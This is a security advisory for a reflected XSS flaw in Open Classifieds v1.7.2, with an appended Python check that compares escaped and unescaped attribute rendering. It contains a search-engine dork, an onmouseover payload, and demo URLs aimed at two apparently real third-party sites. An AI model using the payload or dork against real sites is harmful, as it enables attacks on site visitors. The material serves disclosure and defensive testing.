---------------------------------------------------------------------
[+] Title            : Open Classifieds v1.7.2 XSS Vulnerability
[+] Affected Version : v1.7.2
[+] Software Link    : http://open-classifieds.com/
[+] Tested on        : Windows 7
[+] Date             : 23/08/2011
[+] Dork             : "inurl:/publish-a-new-ad.htm"
[+] Category         : Webapps
[+] Severity         : Medium
[+] Author           : Yassin Aboukir <01Xp01|At|Gmail.com>
[+] Site             : http://www.yaboukir.com
---------------------------------------------------------------------

[+] About the software :

Open Classifieds is a free, open source script for classifieds, advertisements or listings. This web application is developed to be fast, light, secure and SEO friendly. Template enabled and easy to administrate. Some features: Friendly URLs, Cache, Captcha, MySql+PHP+GPL.

[+] Description :

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.

[+] How it can be exploited :

# - http://localhost/oc172/?s="+onmouseover=alert(00000)+

    Move the mouse cursor to the search form, then an alert window will show up.

# - 1- Go to : http://localhost/publish-a-new-ad.htm
    2- The name, email, place, price and title fields are vulnerable to XSS, so an attacker may inject malicious scripts.

[+] Fix : Upgrade to the latest release.

[+] Demos :

http://www.thatdamnedbike.com/oc172/?s="+onmouseover=alert(00000)+
http://www.estudiowebcreativo.com/oc172/?s="+onmouseover=alert(00000)+
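
[+] Added example (not part of the original advisory, and not Open Classifieds code) :

The search-form case above is consistent with the s value being written unencoded into a double-quoted attribute. The Python check below renders a hypothetical search box both ways and parses the result to see which attributes end up on the element. The template, the function names and the sample value are assumptions constructed for this illustration.

```python
import html
from html.parser import HTMLParser

# Constructed template: a search box that reflects the ?s= value into a
# double-quoted attribute. Hypothetical markup, not Open Classifieds source.
TEMPLATE = '<input type="text" name="s" value="{value}">'

# Constructed input: the decoded ?s= value from the advisory
# ("+" in a query string decodes to a space).
SAMPLE = '" onmouseover=alert(00000) '


def render_unsafe(s: str) -> str:
    """Vulnerable pattern: raw value placed inside the quoted attribute."""
    return TEMPLATE.format(value=s)


def render_safe(s: str) -> str:
    """Hardened pattern: encode &, <, >, " and ' for the attribute context."""
    return TEMPLATE.format(value=html.escape(s, quote=True))


class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> element."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = attrs


def input_attrs(markup: str) -> list:
    """Parse the markup and return (name, value) pairs of the <input>."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or []


def event_handlers(markup: str) -> list:
    """Names of on* attributes that ended up on the <input> element."""
    return [name for name, _ in input_attrs(markup) if name.startswith("on")]


if __name__ == "__main__":
    print("unsafe:", event_handlers(render_unsafe(SAMPLE)))
    print("safe:  ", event_handlers(render_safe(SAMPLE)))
```

The same assertion (no on* attribute appears on the element after a quote-bearing value is reflected) can serve as a regression test for each of the form fields the advisory lists.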